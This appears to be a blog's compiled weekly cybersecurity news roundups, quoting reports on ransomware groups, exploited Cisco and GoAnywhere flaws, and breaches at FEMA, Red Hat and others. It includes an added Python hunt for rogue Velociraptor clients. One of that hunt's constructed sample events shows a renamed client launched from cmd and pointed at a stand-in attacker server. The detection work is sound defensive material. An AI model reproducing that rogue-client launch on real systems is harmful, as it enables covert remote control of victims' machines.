    • “Sophos’ latest annual study explores the real-world ransomware experiences of 292 healthcare providers hit by ransomware in the past year. The report examines how the causes and consequences of these attacks have evolved over time. This year’s edition also sheds new light on previously unexplored areas, including the organizational factors that left providers exposed and the human toll ransomware takes on retail IT and cybersecurity teams.”
  • TRM Labs points out “Nine Emerging Groups Shaping the Ransomware Landscape.”
    • “Artificial intelligence (AI) has lowered the barrier to entry for cybercriminals, allowing ransomware threat actors to automate coding, generate polymorphic malware — which alters its code with each infection to evade detection — and create more convincing social engineering lures. As a result, new groups are emerging rapidly, and established groups are scaling their operations. 
    • “In this post, we take a closer look at nine emerging ransomware groups and examine how their off-chain and on-chain tactics are reshaping the ecosystem.”
  • The Hacker News relates,
    • “Three prominent ransomware groups, DragonForce, LockBit, and Qilin, have announced a new strategic ransomware alliance, once again underscoring continued shifts in the cyber threat landscape.
    • “The coalition is seen as an attempt on the part of the financially motivated threat actors to conduct more effective ransomware attacks, ReliaQuest said in a report shared with The Hacker News.
    • “Announced shortly after LockBit’s return, the collaboration is expected to facilitate the sharing of techniques, resources, and infrastructure, strengthening each group’s operational capabilities,” the company noted in its ransomware report for Q3 2025.
    • “This alliance could help restore LockBit’s reputation among affiliates following last year’s takedown, potentially triggering a surge in attacks on critical infrastructure and expanding the threat to sectors previously considered low risk.”
  • Per Cyberscoop,
    • “Microsoft Threat Intelligence said a cybercriminal group it tracks as Storm-1175 has exploited a maximum-severity vulnerability in GoAnywhere MFT to initiate multi-stage attacks including ransomware. Researchers observed the malicious activity Sept. 11, Microsoft said in a blog post Monday.
    • “Microsoft’s research adds another substantive chunk of evidence to a growing collection of intelligence confirming the defect in Fortra’s file-transfer service was exploited as a zero-day before the company disclosed and patched CVE-2025-10035 on Sept. 18.
    • “Despite this mounting pile of evidence, Fortra has yet to confirm the vulnerability is under active exploitation. The company has not answered questions or provided additional information since it updated its security advisory Sept. 18 to include indicators of compromise. 
    • “Storm-1175, a financially motivated cybercrime group known for exploiting public vulnerabilities to gain access and deploy Medusa ransomware, exploited CVE-2025-10035 to achieve remote code execution, according to Microsoft.”
  • Per Dark Reading,
    • “A China-based threat group known as Storm-2603 has added a new weapon to its hacking arsenal.
    • “Cisco Talos researchers observed Storm-2603 abusing Velociraptor, an open-source digital forensics and incident response (DFIR) tool, in a recent ransomware attack. The open-source project, which was acquired by Rapid7 in 2021, was designed by security researcher Michael Cohen to assist incident response teams with endpoint monitoring and investigations. However, it seems attackers have turned the tables on defenders and are now leveraging Velociraptor to conceal their malicious activity.”
    • “Storm-2603 initially burst on to the threat landscape in July as one of several threat groups exploiting a set of SharePoint vulnerabilities in an attack chain known as “ToolShell.” There, the threat actors gained access to SharePoint servers, moved laterally in the victims’ networks, and deployed Warlock ransomware. In a blog post published Thursday, Cisco Talos researchers said they responded to a different incident in August, in which threat actors dropped three different types of ransomware on the victim’s VMware ESXi servers — Warlock, LockBit, and Babuk — and caused severe disruption to the organization.
    • “In addition to the ransomware trio, Cisco Talos found Storm-2603 actors had also deployed Velociraptor to aid their attack. It was a shift in strategy; the researchers noted that the tool had not been definitively tied to ransomware attacks prior to August.”
  • and
    • “Chaos ransomware has gotten a significant facelift with an “aggressive” new variant that adds destructive tactics and clipboard hijacking for cryptocurrency theft, as well as other capabilities to bolster its operations for speed and effectiveness.
    • “Researchers from FortiGuard Labs have identified a new version of Chaos ransomware written in C++, the first not written in .NET, they revealed in a report published Wednesday. This evolution also introduces a host of new features that make the ransomware harder to disrupt once it’s in execution, as well as more destructive than previous versions.
    • “This evolution underscores Chaos’s shift toward more aggressive methods, amplifying both its operational impact and the financial risk it poses to victims,” FortiGuard researcher Yen-Ting Lee wrote in the report.”
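The Velociraptor item above is a reminder that a legitimate DFIR agent on an endpoint is only benign when it is the organisation's own deployment. The following is an added example, not Cisco Talos' or Rapid7's code, of a hunt over process-creation telemetry that flags Velociraptor executions which do not match a sanctioned install: wrong path, wrong binary hash, a client pointed at a server other than the organisation's, or a launch from an interactive shell instead of the service manager. The events are constructed Sysmon-style JSON lines, and the sanctioned path, hash and server host are assumptions to be replaced with your own inventory values.

```python
"""Added example (not Talos' or Rapid7's code): hunt for Velociraptor clients
that do not match the organisation's sanctioned deployment. Events are
constructed Sysmon-style process-creation records, not real telemetry."""
import json
import re

# Assumed sanctioned deployment; replace with the values from your own inventory.
SANCTIONED_IMAGES = {r"c:\program files\velociraptor\velociraptor.exe"}
SANCTIONED_SHA256 = {"0" * 64}          # placeholder hash of the approved client build
SANCTIONED_SERVER = "velo.corp.example"  # host the approved client is configured to reach
SHELL_PARENTS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\wscript.exe")

# Constructed events: one sanctioned client, one renamed rogue client, one unrelated process.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"UtcTime": "2025-08-12 03:11:02", "Computer": "esx-mgmt01",
     "Image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "OriginalFileName": "velociraptor.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r'"C:\Program Files\Velociraptor\Velociraptor.exe" --config '
                    r'"C:\Program Files\Velociraptor\client.config.yaml" client',
     "Hashes": "SHA256=" + "0" * 64},
    {"UtcTime": "2025-08-12 03:14:47", "Computer": "esx-mgmt01",
     "Image": r"C:\Windows\Temp\svc.exe",
     "OriginalFileName": "velociraptor.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\Temp\svc.exe --config https://velo.attacker-infra.test/client.yaml client -v",
     "Hashes": "SHA256=" + "f" * 64},
    {"UtcTime": "2025-08-12 03:15:10", "Computer": "esx-mgmt01",
     "Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe", "Hashes": "SHA256=" + "1" * 64},
])


def parse_events(text):
    """One JSON object per non-empty line."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def sha256_of(event):
    """Sysmon packs hashes as 'SHA256=...,MD5=...'; pull out the SHA256."""
    for part in event.get("Hashes", "").split(","):
        key, _, value = part.partition("=")
        if key.strip().upper() == "SHA256":
            return value.strip().lower()
    return ""


def is_velociraptor(event):
    """Name-based match. OriginalFileName comes from the PE version resource,
    so it survives the binary being renamed on disk (it does not survive a
    stripped resource; for that, fall back to hash or import-based rules)."""
    haystack = " ".join(event.get(k, "") for k in ("Image", "CommandLine", "OriginalFileName"))
    return "velociraptor" in haystack.lower()


def assess(event):
    """Reasons this Velociraptor execution deviates from the sanctioned deployment."""
    reasons = []
    image = event.get("Image", "").lower()
    if image not in SANCTIONED_IMAGES:
        reasons.append(f"unexpected image path: {image}")
    if sha256_of(event) not in SANCTIONED_SHA256:
        reasons.append("binary hash not in the approved build list")
    for host in re.findall(r"https?://([\w.-]+)", event.get("CommandLine", "")):
        if host.lower() != SANCTIONED_SERVER:
            reasons.append(f"client pointed at foreign server: {host}")
    if event.get("ParentImage", "").lower().endswith(SHELL_PARENTS):
        reasons.append("launched from an interactive shell rather than the service manager")
    return reasons


def hunt(text):
    """Return one hit per Velociraptor execution that has at least one deviation."""
    hits = []
    for event in parse_events(text):
        if not is_velociraptor(event):
            continue
        reasons = assess(event)
        if reasons:
            hits.append({"time": event.get("UtcTime"), "host": event.get("Computer"),
                         "image": event.get("Image"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(json.dumps(hit, indent=2))
```

The sanctioned client produces no hit, so the rule stays quiet on a fleet that really does run Velociraptor; the renamed copy under `C:\Windows\Temp` trips all four checks. The server-host check only fires when a URL appears on the command line, which is a heuristic; a config file that embeds the server address needs the file itself inspected.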

From the cybersecurity defenses front,

  • Cybersecurity Dive reports,
    • “Managing cyber risk has become a point of emphasis in the insurance and asset management sector, with companies boosting annual expenditures and increasing oversight at the board level, according to a report released Wednesday by Moody’s.
    • “Almost seven of every 10 companies have a chief information security officer overseeing corporate cyber risk, while another 10% of companies have a chief information officer overseeing cybersecurity. 
    • “More than 95% of organizations have their CISOs provide briefings directly to the chief executive officer at least on a semiannual basis. This compared with 88% using that practice in 2023.
    • “In addition, seven of 10 companies have their CISO brief the corporate board of directors, at least on a semiannual basis. This compares with 54% in 2023. Four of every 10 companies link CEO compensation to the company’s cybersecurity performance, a sharp increase from just 24% in 2023.” 
  • The Wall Street Journal adds,
    • “Security chiefs are emerging as sought-after advisers as companies plunge headlong into artificial intelligence.
    • “Although the rising threat of cyberattacks has elevated the role of chief information security officers in recent years, some say they are appearing more frequently before their boards and senior executives to help unpack the risks associated with AI.
    • “Often jokingly referred to as the “Department of No” inside companies, security staff are now being actively consulted on AI implementations. This includes explaining risks to management and collaborating with other parts of the business that haven’t typically worked closely with cybersecurity.
    • “Security was always thought of as the boat anchor; what I want is to be the boat motor,” said Pablo De La Rosa, vice president of information security at electric vehicle infrastructure specialist Vontier.”
  • Dark Reading discusses the cyber-risks associated with AI note takers. “Transcription applications are joining your online meetings. Here’s how to create policies for ensuring compliance and security of your information.”
  • Security Week notes,
    • “Google has several projects focusing on the use of AI for the discovery of vulnerabilities in software. The tech giant recently reported that its Big Sleep agent discovered a critical SQLite vulnerability and thwarted efforts to exploit it in the wild.
    • “Its latest product is CodeMender, an AI agent that not only finds security holes but also patches them. The company argues that such tools are needed because as AI gets better at discovering flaws, it will be difficult for humans to keep up with patching.” 
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy front,

  • Federal News Network reports,
    • “The Cybersecurity and Infrastructure Security Agency typically marks October’s awareness month with a range of public engagements and outreach campaigns. But under the ongoing government shutdown, CISA has furloughed nearly two-thirds of its staff and curtailed most public communication.
    • “CISA is not actively managing its website under the shutdown. But the agency did establish a landing webpage for cybersecurity awareness month prior to the shutdown, detailing the campaign’s theme and linking to a toolkit.
    • “CISA Director of Public Affairs Marci McCarthy said, “CISA remains fully committed to safeguarding the nation’s critical infrastructure,” as part of a statement.” * * *
    • “Chris Cummiskey, a former state chief information officer and former chief management officer at DHS, said CISA typically retains enough employees to staff the agency’s watch floor, maintain technology that monitors federal networks for cyber threats, and collaborate with cyber defenders at other federal organizations, like U.S. Cyber Command.
    • “But if a major cyber incident were to occur, CISA may not have enough staff immediately on hand to manage the event.
    • “A key concern is, do you need to start recalling people?” Cummiskey said. “You probably wouldn’t have the onsite capacity to cover a major exploit without the additional help.”
    • “In addition to the shutdown, key privacy and liability protections under the Cybersecurity Information Sharing Act of 2015 expired on Sept. 30. Those protections had been pivotal to encouraging private companies to share cyber threat data with each other and with government agencies, including CISA.
    • “Cyber experts say companies may be more hesitant to share information about new cyber threats and vulnerabilities without the statute’s protections.”
  • Cybersecurity Dive adds,
    • “Michael Daniel, president of the Cyber Threat Alliance, an information-sharing group, predicted that some companies will “suspend some sharing activities with the government,” but he added that a lot will depend on “each company’s risk tolerance.”
    • “I think some collaboration will continue,” he said, “but likely at reduced levels and requiring more human oversight.”
    • “Ari Schwartz, managing director of cybersecurity services at the law firm Venable, said, “There will just be many more lawyers involved, and it will all go slower, particularly new sharing agreements.” Venable has advised clients on what to consider when establishing such agreements.
    • “As for companies sharing information with each other, that likely will continue for now because of a lack of near-term concern about antitrust investigations, Daniel said. But companies’ attitudes could change if the program isn’t reauthorized.”
  • The National Institute of Standards and Technology announced on September 29, 2025,
    • “As part of ongoing efforts to strengthen the protections for securing controlled unclassified information (CUI) in nonfederal systems [which includes FEHB and PSHB claims data], NIST has released the following drafts for comment:
    • SP 800-172r3 (Revision 3) fpd (final public draft), Enhanced Security Requirements for Protecting Controlled Unclassified Information, provides new enhanced security requirements that support cyber resiliency objectives, focus on protecting CUI, and are consistent with the source controls in SP 800-53r5.
    • SP 800-172Ar3 ipd (initial public draft), Assessing Enhanced Security Requirements for Controlled Unclassified Information, provides a set of assessment procedures for the enhanced security requirements. These procedures are based on the source assessment procedures in SP 800-53Ar5.” * * *
    • “A public comment period will be open from September 29 through November 14, 2025. Reviewers should submit comments on all or parts of the drafts to 800-171comments@list.nist.gov.”
  • Cybersecurity Dive tells us,
    • “Barely any U.S. defense contractors say they’re fully prepared to comply with the Department of Defense’s new cybersecurity assessment program.
    • “Only 1% of companies say they’re completely ready to be assessed through the Cybersecurity Maturity Model Certification (CMMC) program, which takes effect on Nov. 10, according to a report that the managed security provider CyberSheath published on Wednesday.
    • “The percentage of respondents expressing confidence in their readiness has dropped over the past two years.”

From the cybersecurity vulnerabilities and breaches front,

  • NextGov/FCW reports on September 29, 2025,
    • “A “widespread cybersecurity incident” at the Federal Emergency Management Agency allowed hackers to make off with employee data from both the disaster management office and U.S. Customs and Border Protection, according to a screenshot of an incident overview presentation obtained by Nextgov/FCW.
    • “The hack is also suspected to have later triggered the dismissal of two dozen Federal Emergency Management Agency technology employees announced late last month, according to internal meeting notes and a person familiar with the matter.
    • “The initial compromise began June 22, when hackers accessed Citrix virtual desktop infrastructure inside FEMA using compromised login credentials. Data was exfiltrated from Region 6 servers, the image says. That FEMA region services Arkansas, Louisiana, New Mexico, Oklahoma and Texas, as well as nearly 70 tribal nations.” * * *
    • “DHS security operations staff were notified of the breach on July 7, the screenshot adds. On July 14, the unnamed threat actor used an account with high-level access and attempted to install virtual networking software that could allow them to extract information. Initial remediation steps were taken on July 16. 
    • “On Sept. 5, additional remediation actions were taken, including changing FEMA Zscaler policies and blocking certain websites, the screenshot says. Those actions were previously reported by Nextgov/FCW.”
  • Following up on last Saturday’s post about the Cisco KEVs, Cybersecurity Dive lets us know,
    • “Nearly 50,000 Cisco firewall devices with recently disclosed vulnerabilities are connected to the internet, according to new data.
    • “Statistics from the Shadowserver Foundation illustrate the extent of the world’s exposure to the three flaws in Cisco’s Adaptive Security Appliance devices and Firepower Threat Defense devices, which earned a rare emergency patching directive from the Cybersecurity and Infrastructure Security Agency (CISA) after the Sept. 25 disclosure.
    • “The United States has by far the most devices that have not been patched to block exploitation of the flaws, with Shadowserver tallying more than 19,000 vulnerable U.S. devices. The U.K. ranks second, with more than 2,700 vulnerable devices, followed by Japan, Germany and Russia. Other European countries have fewer than 1,000 vulnerable devices each.
    • “Shadowserver’s records will reveal how quickly different countries are reducing their exposure as the organization continues collecting data in the coming days and weeks.
    • “A sophisticated threat actor has been using two of the new Cisco flaws, CVE-2025-20362 and CVE-2025-20333, in a stealthy cyberattack campaign that has breached multiple federal agencies and other organizations worldwide. Both vulnerabilities involve improper validation of HTTPS requests, which could allow Cisco firewalls to accept malicious requests that bypass authentication. CVE-2025-20362 could allow hackers to access restricted VPN-related URLs, while CVE-2025-20333 could let intruders run arbitrary code as root.”
  • Cyberscoop points out,
    • “Red Hat on Thursday [October 2, 2025] confirmed an attacker gained access to and stole data from a GitLab instance used by its consulting team, exposing some customer data. The open-source software company, a subsidiary of IBM, said the breach is contained and an investigation into the attack is underway. 
    • “Upon detection, we promptly launched a thorough investigation, removed the unauthorized party’s access, isolated the instance, and contacted the appropriate authorities,” Red Hat said in a security update. “Our investigation, which is ongoing, found that an unauthorized third party had accessed and copied some data from this instance.”
    • “Red Hat said the compromised GitLab instance contained work related to consulting engagements with some customers, including project specifications, example code snippets and internal communications about the consulting services. 
    • “This GitLab instance typically does not house sensitive personal data,” Red Hat said. “While our analysis remains ongoing, we have not identified sensitive personal data within the impacted data at this time.”
  • Dark Reading informs us,
    • “The month-long outage for luxury car maker Jaguar Land Rover appears to be at an end, with the company working through a “controlled, phased restart” of its manufacturing operations this week, following a massive cyberattack that forced the company to shut down its systems.
    • “JLR said on Sept. 2 that it had “proactively” shut down operations following a cyber incident, initially stating that customer data did not seem to be stolen, but revising that statement a week later. JLR, a subsidiary of Tata Motors, likely suffered $50 million to $70 million in lost revenue per week, with the total cost of the incident estimated at a staggering $1.7 billion to $2.4 billion.
    • “The attack, and its vast impact, should be a warning for companies, says Chris Gibson, executive director of the Forum of Incident Response and Security Teams (FIRST).
    • “The outage “highlights that even large corporations with substantial resources can be completely disrupted and that critical industries may be more vulnerable than previously thought,” he says. “This was far beyond data theft; it was a complete operational outage.”
  • Security Week adds,
    • “Japanese brewing giant Asahi Group Holdings on Monday [September 29, 2025] announced that its operations in the country have been disrupted by a cyberattack.
    • “The incident, the company said, resulted in system failures that affected orders and shipments at all its subsidiaries in the country, as well as call center operations, customer service desks included.
    • “Reuters reported that production at some of Asahi’s 30 domestic factories has been suspended due to the cyberattack.
    • “At this time, there has been no confirmed leakage of personal information or customer data to external parties,” the company said in a Monday notice.
    • “Asahi said it is investigating the attack and working on restoring the affected systems but could not provide an estimated timeline for recovery.
    • “The system failure is limited to our operations within Japan,” it said.
    • “The company has not disclosed the nature of the cyberattack it fell victim to, but the system-wide outage could indicate that file-encrypting ransomware might have been used.”

From the ransomware front,

  • Cybersecurity Dive reports,
    • “Corporate executives are being targeted in an email-based extortion campaign by a threat actor claiming affiliation with the notorious Clop ransomware gang, according to security researchers from Google Threat Intelligence Group and Kroll. 
    • “The hacker claims to have data stolen from breached Oracle E-Business Suite applications and has been demanding payment from various corporate executives, according to a LinkedIn post from Austin Larsen, principal threat analyst at GTIG.
    • “While researchers have not been able to substantiate the claims of a data breach, they have confirmed important links to a financially motivated threat group tracked under the name FIN11, which has prior associations with Clop.” 
  • Cyberscoop provides us with “the email Clop attackers sent to Oracle customers. The emails, which are littered with broken English, aim to instill fear, apply pressure, threaten public exposure and seek negotiation for a ransom payment.”
  • Dark Reading adds,
    • “After announcing its farewell last month, the cyber extortion group known as Scattered Lapsus$ Hunters returned on Friday with a website featuring stolen Salesforce data and a list of dozens of alleged victims.
    • “Scattered Lapsus$ Hunters is an apparent combination of the Scattered Spider, Lapsus$, and ShinyHunters cybercriminal groups, which first emerged over the summer in a public Telegram channel. However, just a few weeks later, the collective published a goodbye letter on Telegram and the Dark Web marketplace BreachForums, saying the three groups, as well as other threat actors, had “decided to go dark.”
    • “But Scattered Lapsus$ Hunters burst back into the limelight this week with a Dark Web leak site devoted to the recent spate of Salesforce data thefts; one of the two distinct campaigns targeting Salesforce environments recently has been attributed to a threat group tracked by Google as UNC6040, which has claimed to be ShinyHunters in its extortion attempts.
    • “According to Google, UNC6040 actors used vishing calls to convince IT support personnel at targeted organizations to grant them access to or credentials for the organizations’ Salesforce environments. Mandiant researchers this week said the threat actors have impersonated third-party vendors in the vishing calls and had also targeted users in victim organizations with elevated access to other SaaS applications.”
  • The American Hospital Association points out,
    • “A Health-ISAC (Information Sharing and Analysis Center) bulletin released Oct. 1 warns of a recently released LockBit 5.0 ransomware variant that poses a threat to health care and other sectors. LockBit 5.0 is the latest version of the ransomware-as-a-service group that has previously attacked hospitals and other organizations in the U.S. and abroad. The notice said the new variant directly targets virtual environments and has improved and enhanced technical capabilities, evasion techniques and affiliate engagement. The variant is known to target Windows, Linux and VMware ESXi software. Health-ISAC said the new variant’s technical capabilities make it faster, more flexible for affiliates and harder for security to detect and analyze. LockBit was disrupted by authorities last year before resurfacing last month.
    • “This is a very technical bulletin, but it’s important to note that it addresses a new version of a well-known ransomware,” said Scott Gee, AHA deputy national advisor for cybersecurity and risk. “Hospitals should ensure that they have defensive measures in place and that those measures are tuned and working properly.”
  • HackRead reports on September 29,
    • “The Medusa ransomware group is claiming responsibility for a ransomware attack on Comcast Corporation, a global media and technology company best known for its broadband, television, and film businesses.
    • “According to the group’s dark web leak site, they exfiltrated 834.4 gigabytes of data and are demanding $1.2 million for interested buyers to download it. The same sum has been set as ransom for Comcast if the company wants the data deleted rather than leaked or sold.
    • “To back its claims, Medusa has posted around 20 screenshots allegedly showing internal Comcast files. The group also shared a massive file listing of 167,121 entries, suggesting access to actuarial reports, product management data, insurance modelling scripts, and claim analytics.” * * *
    • “Medusa ransomware is known for publishing file listings and partial screenshots as proof of compromise while holding back the bulk of the data to increase ransom pressure. In this case, the nature of the files points toward actuarial and financial datasets, some of which appear to involve insurance calculations, customer data processing, and claim management systems.”
  • HelpNetSecurity provides us background about and advice on how to avoid Akira ransomware.
  • Wired notes that “Google has launched a new AI-based protection in Drive for desktop that can shut down a [ransomware] attack before it spreads—but its benefits have their limits.”

From the cybersecurity defenses front,

  • Per ISACA,
    • “Cybersecurity professionals from around the world recently weighed in on some of the key findings from ISACA’s latest State of Cybersecurity survey report. Aparna Achanta, security leader, IBM (US); Simon Backwell, head of information security, Benefex (UK); Donavan Cheah, senior cybersecurity consultant, Thales (Singapore); Jenai Marinkovic, vCISO/CTO, Tiro Security, and CEO & chairman of the board, GRCIE (US); Kannammal Gopalakrishnan, cybersecurity and GRC professional (India), and Carlos Portuguez, Sr. Director BISO, Concentrix (Costa Rica)—all of whom are also members of ISACA’s Emerging Trends Working Group—reflect on how these stats show up for them in the profession.”
  • and
    • “Phishing has escalated beyond masquerading techniques. Traditional attacks depended on typos, being in a rush and not so well-disguised social engineering. But hackers today use generative AI, such as WormGPT or FraudGPT, and even deepfakes, to create perfect messages with contextual background that can effortlessly be mixed with everyday corporate messages. Cofense has noted that it receives an AI-enhanced malicious email every 42 seconds, with that pace expected to accelerate in the months to come. This hypergrowth is an indication that phishing is not an outlying issue anymore but a mainstream cyber-crime, now with AI-driven precision. 
    • “The next pivot is neuro-phishing, which can tie in the details of biometric and psycho-physiological indicators, like the EEG, micro-hesitation spikes, blink frequency, and the focus of the eyes, to see the response of the user in real-time and work a different approach. Previous and extensive studies have already established the reliability of finding recognition and stress using the EEG, when users are stimulated with phishing. This is not passive baiting anymore, but a dynamic, cognitive feedback loop, which transforms human users into interactive targets.”
    • The article offers advice on creating resilience against neuro-phishing.
  • Dark Reading adds,
    • “Email security has long dominated the enterprise security conversation — and rightfully so. It remains a key vector for phishing, credential theft, and social engineering. But in 2025, the threat landscape has shifted. Quietly yet decisively, attackers increasingly are bypassing the inbox and expanding their reach across multiple channels. 
    • “Recent data from TechMagic shows that 41% of phishing incidents now employ multichannel tactics, including SMS (smishing), voice calls (vishing), and QR codes (quishing). The trend is clear: While email still matters, adversaries are shifting to mobile-first platforms like text, iMessage, WhatsApp, and social direct messages. These attacks are harder to spot, more difficult to control, and more likely to succeed, because they target the most vulnerable point in the chain: the human behind the screen.
    • “To address this growing threat to mobile platforms, new security approaches are emerging that leverage AI-driven defenses to identify and prevent social engineering attacks in real-time. By training large language models (LLMs) to understand the content and intent behind messages, these systems can flag suspicious activity and enforce protective measures before users fall victim. Whether it’s a text message posing as IT support or impersonating a vendor, these next-generation solutions focus on stopping threats at the human layer — not just at the device.”
  • Infosecurity Magazine explains how “AI-Generated Code Used in Phishing Campaign Blocked by Microsoft.”
  • Per CISO Online,
    • “A surge in vulnerabilities and exploits leaving overloaded security teams with little recourse but to embrace risk-based approaches to patching what they can.
    • “Enterprise attack surfaces continue to expand rapidly, with more than 20,000 new vulnerabilities disclosed in the first half of 2025, straining already hard-pressed security teams.
    • “Nearly 35% (6,992) of these vulnerabilities have publicly available exploit code, according to the Global Threat Intelligence Index study by threat intel firm Flashpoint.
    • “The volume of disclosed vulnerabilities has more than tripled while the amount of exploit code has more than doubled since the end of February 2025 alone.
    • “These increases make it no longer feasible for most organizations to triage, remediate, or mitigate every vulnerability, Flashpoint argues, suggesting enterprises need to apply a risk-based patching framework. But some experts quizzed by CSO went further — arguing a complete operational overhaul of vulnerability management practices is needed.
    • The article delves into that approach.
  • Per the National Institute of Standards,
    • “The NIST National Cybersecurity Center of Excellence (NCCoE) has finalized a guide, NIST Special Publication (SP) 1334, Reducing the Cybersecurity Risks of Portable Storage Media in Operational Technology (OT) Environments, to help organizations protect their industrial control systems from cybersecurity threats when using removable media devices.
    • “Portable storage media devices, like USB flash drives, are commonly used to transfer data between computers. However, using them in OT environments and industrial control systems, such as those used in power plants or manufacturing facilities, can pose a cybersecurity risk. If a USB device is infected with malware, it can spread to the industrial control system and cause problems, such as disrupting operations or compromising safety.
    • “This NCCoE resource suggests implementing physical and technical controls to limit access to these devices and ensure they are used securely.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Health ISAC reminds us,
    • “Despite widespread public and private interest in reauthorizing the U.S. Cybersecurity Information Sharing Act of 2015 (“CISA 2015”)[i], we are rapidly approaching September 30th, the date when the Act is set to expire barring congressional action to extend it. With time running short, let’s assess the options still being considered and break down how and why reauthorization is going down to the wire.” * * *
    • “The current most likely path for a CISA 2015 reauthorization is not a simple standalone bill that is quickly passed by both chambers. Instead, the most likely path runs through a short term extension as part of a continuing resolution (“CR”) and then through the National Defense Authorization Act (“NDAA”).
    • “For those who are unfamiliar, a CR is a “temporary spending [bill] that [allows] federal government operations to continue when final appropriations have not been approved by Congress and the President. Without final appropriations or a CR, there could be a lapse in funding that results in a government shutdown.”[ii] The NDAA is an annual end-of-year bill that provides appropriations for the Department of Defense (“DOD”). It is generally considered to be a “must pass” piece of legislation to which lawmakers attempt to add otherwise unrelated policy matters.”
  • Nextgov/FCW tells us,
    • “Greg Barbaccia, the federal chief information officer, says that the Office of Management and Budget is backing the General Services Administration’s overhaul of FedRAMP, the government’s cloud security assessment and authorization program. 
    • “GSA launched FedRAMP 20x — meant to use more automation in place of annual assessments, cut red tape and speed up authorizations — in March. It announced its phase two pilot on Wednesday.
    • “Barbaccia acknowledged the past problems with FedRAMP at a Wednesday event held by the Alliance for Digital Innovation. 
    • “I have done FedRAMP in my past life,” said Barbaccia, who previously worked at Palantir and more recently at a machine-learning enabled asset manager. “What a pain in the butt.”
    • “The FedRAMP program is planning on pursuing 10 pilot authorizations at the Moderate security level as part of the new phase of FedRAMP 20x, said FedRAMP Director Pete Waterman.”
  • Per a Cybersecurity and Infrastructure Security Agency (“CISA”) news release,
    • “Today [September 23, 2025], the Cybersecurity and Infrastructure Security Agency (CISA) announced the appointment of Stephen L. Casapulla as the Executive Assistant Director for Infrastructure Security.
    • “I am pleased to have Steve expand his role on CISA’s leadership team,” said Acting Director Madhu Gottumukkala. “With his extensive experience in critical infrastructure security and working with stakeholders, he is perfectly poised to lead our efforts in securing the nation’s critical infrastructure. I look forward to working with him on this important mission.”
    • “Prior to joining CISA, Casapulla served as the Director for Critical Infrastructure Cybersecurity in the Office of the National Cyber Director. He previously spent over thirteen years at CISA and its predecessor, holding a variety of senior roles. His prior federal service includes work at the Small Business Administration and at the Department of State in Iraq. He also serves as an officer in the U.S. Navy Reserve, with over twenty years of service and multiple overseas deployments.”

From the cybersecurity vulnerabilities and breaches front,

  • Cybersecurity Dive reports,
    • “The Cybersecurity and Infrastructure Security Agency on Thursday [September 25, 2025] ordered U.S. government agencies to patch multiple vulnerabilities in Cisco networking products, saying an “advanced threat actor” was using them in a “widespread” campaign.
    • “This activity presents a significant risk to victim networks,” CISA said in an emergency directive that laid out a mandatory timeline for agencies to identify, analyze and patch vulnerable devices.
    • “The hacking campaign — an extension of the sophisticated “ArcaneDoor” operation that Cisco first revealed in April 2024 — has compromised multiple federal agencies, two U.S. officials told Cybersecurity Dive. Both officials requested anonymity to discuss a sensitive and evolving investigation.”
  • Cyberscoop adds,
    • “Cisco said it began investigating attacks on multiple government agencies linked to the state-sponsored campaign in May. The vendor, which attributes the attacks to the same threat group behind an early 2024 campaign targeting Cisco devices it dubbed “ArcaneDoor,” said the new zero-days were exploited to “implant malware, execute commands, and potentially exfiltrate data from the compromised devices.” 
    • “Cisco disclosed three vulnerabilities affecting its Adaptive Security Appliances — CVE-2025-20333, CVE-2025-20363 and CVE-2025-20362 — but said “evidence collected strongly indicates CVE-2025-20333 and CVE-2025-20362 were used by the attacker in the current attack campaign.”
    • “The Cybersecurity and Infrastructure Security Agency said those two zero-days pose an “unacceptable risk” to federal agencies and require immediate action.”
  • Dark Reading points out,
    • “The Cybersecurity and Infrastructure Security Agency (CISA) this week disclosed that threat actors breached a federal agency last year by exploiting a critical vulnerability in the open source GeoServer mapping server.
    • “In the advisory, CISA said it conducted incident response at a large, unnamed federal civilian executive branch (FCEB) agency after malicious activity was flagged by the agency’s endpoint detection and response (EDR) platform, but found the agency’s response playbook to be lacking; so lacking in fact that it hampered CISA’s investigation and allowed the attackers to burrow deeper into the network unchecked.”
  • Cybersecurity Dive adds,
    • “[On September 23, 2025,] the Cybersecurity and Infrastructure Security Agency urged security teams to monitor their systems following a massive supply chain attack that struck the Node Package Manager ecosystem. 
    • “The attack, tracked under the name Shai-Hulud, involved a self-replicating worm that compromised more than 500 software packages, according to StepSecurity. 
    • “After gaining access, a malicious attacker injected malware and scanned the environment for sensitive credentials. The credentials included GitHub Personal Access Tokens and application programming interface keys for various cloud services, including Amazon Web Services, Google Cloud Platform and Microsoft Azure. 
    • “The stolen credentials were uploaded to an endpoint controlled by the attacker and then uploaded to a public repository called Shai-Hulud. 
    • “Researchers at Palo Alto Networks said the attacker used an LLM to write the malicious script, according to an updated blog post released Tuesday.” 
  • Cybersecurity Dive relates,
    • “Hackers are conducting brute force attacks against the MySonicWall.com portal in order to access the company’s cloud backup service for firewalls, SonicWall and federal authorities warned in advisories released Monday [September 22, 2025].
    • “SonicWall said its investigation found that hackers gained access to 5% of backup firewall preference files. The company warned that while credentials inside the files were encrypted, the files contained other information that could help attackers exploit the firewall, according to the advisory.  
    • “SonicWall also released a video explaining the scope of the incident. 
    • “In an advisory on Monday, the Cybersecurity and Infrastructure Security Agency urged customers to log into their accounts to determine whether their devices are at risk.”
  • Cyberscoop reports,
    • “The Secret Service said Tuesday [September 23, 2025] that it disrupted a network of electronic devices in the New York City area that posed imminent telecommunications-based threats to U.S. government officials and potentially the United Nations General Assembly meeting currently underway.
